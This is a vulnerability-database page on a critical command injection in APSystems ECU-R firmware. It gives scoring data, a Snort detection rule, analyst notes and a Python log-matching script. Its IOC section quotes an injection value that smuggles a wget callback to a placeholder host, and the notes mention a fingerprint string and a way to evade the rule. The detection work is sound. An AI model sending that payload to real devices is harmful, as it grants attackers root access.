cbcvebase.
CVE-2022-45699
published 2023-02-10


Priority: P192 critical
CVSS 3.1: 9.8
AV:N AC:L PR:N UI:N S:U C:H I:H A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 76.60% (99.5th percentile)
Command injection in the administration interface in APSystems ECU-R version 5203 allows a remote unauthenticated attacker to execute arbitrary commands as root using the timezone parameter.

Affected

1 range

Vendor      Product          Version range   Fixed in
apsystems   ecu-r_firmware

Detection & IOCs (extracted from sources)

url: /index.php/management/set_timezone
command: timezone=;wget+{{interactsh-url}};#
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS APsystems ECU-R Command Inject Attempt (CVE-2022-45699)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:34; content:"/index.php/management/set_timezone"; fast_pattern; http.request_body; content:"timezone|3d|"; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:url,unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/; reference:cve,2022-45699; classtype:attempted-admin; sid:2057254; rev:1; metadata:attack_target Networking_Equipment, tls_state plaintext, created_at 2024_11_05, cve CVE_2022_45699, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2024_11_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Fingerprint the target by checking for the string 'Altenergy Power Control Software' in the HTTP response body of the root path before attempting exploitation.
  • Exploit traffic is unauthenticated (no session/auth headers required) — a POST to /index.php/management/set_timezone with a timezone parameter containing shell metacharacters (;, newline, backtick, pipe, $) is the attack pattern.
  • The Snort/Suricata rule matches on: POST method + URI bsize exactly 34 bytes (/index.php/management/set_timezone) + request body containing 'timezone=' followed by shell injection metacharacters (;/%3B, newline/%0A, backtick/%60, pipe/%7C, dollar/%24).
  • This CVE has been linked to Mirai botnet variant exploitation in the wild; monitor for subsequent outbound wget/curl callbacks or bot enrollment traffic after a successful injection.
  • The Snort rule (sid:2057254) specifies tls_state plaintext; it will NOT fire on TLS-encrypted traffic. Ensure the sensor is positioned where plaintext HTTP is visible.
  • The URI match uses bsize:34 (exact byte-length match on the URI), meaning URL-encoded or path-varied requests may evade this specific rule.
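
The rule's matching conditions from the notes above, re-expressed as a log-side check over already-parsed HTTP requests (an added example, not code from this page or its sources). The request tuples, the PLACEHOLDER bodies and the function names are constructed for illustration; normalized_match also percent-decodes the path, which addresses the bsize:34 note.

```python
import re
from urllib.parse import unquote, urlsplit

TARGET_URI = "/index.php/management/set_timezone"  # 34 bytes, as in bsize:34

# Same alternation as the rule's pcre: ; newline ` | $ (literal or
# percent-encoded) inside the timezone value, before the next '&'.
META = re.compile(r"timezone=[^&]*?(?:;|%3[Bb]|\n|%0[Aa]|`|%60|\||%7[Cc]|\$|%24)")


def strict_match(method: str, uri: str, body: str) -> bool:
    """Approximate the rule: POST + exact URI + metacharacter in timezone."""
    return method == "POST" and uri == TARGET_URI and bool(META.search(body))


def normalized_match(method: str, uri: str, body: str) -> bool:
    """Same check after dropping any query string and decoding the path."""
    path = unquote(urlsplit(uri).path)
    return method == "POST" and path == TARGET_URI and bool(META.search(body))


# Constructed sample requests: (method, uri, body). Not captured traffic.
SAMPLES = [
    ("POST", TARGET_URI, "timezone=Europe/Paris"),              # benign
    ("POST", TARGET_URI, "timezone=Europe/Paris;PLACEHOLDER"),  # literal ;
    ("POST", TARGET_URI, "timezone=UTC%7CPLACEHOLDER"),         # encoded |
    ("POST", "/index.php/management/set%5Ftimezone",
     "timezone=UTC%3BPLACEHOLDER"),                             # encoded URI
    ("POST", TARGET_URI, "timezone=UTC&note=a;b"),              # ; after '&'
    ("GET", TARGET_URI, "timezone=UTC;PLACEHOLDER"),            # wrong method
]


def triage(requests):
    """Return (strict, normalized) verdicts for each request."""
    return [(strict_match(*r), normalized_match(*r)) for r in requests]


if __name__ == "__main__":
    for req, verdict in zip(SAMPLES, triage(SAMPLES)):
        print(verdict, req[0], req[1], repr(req[2]))
```

A request flagged only by normalized_match is one the exact-length URI condition would miss.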

CVSS provenance

nvd         v3.1   9.8 CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck          9.8 CRITICAL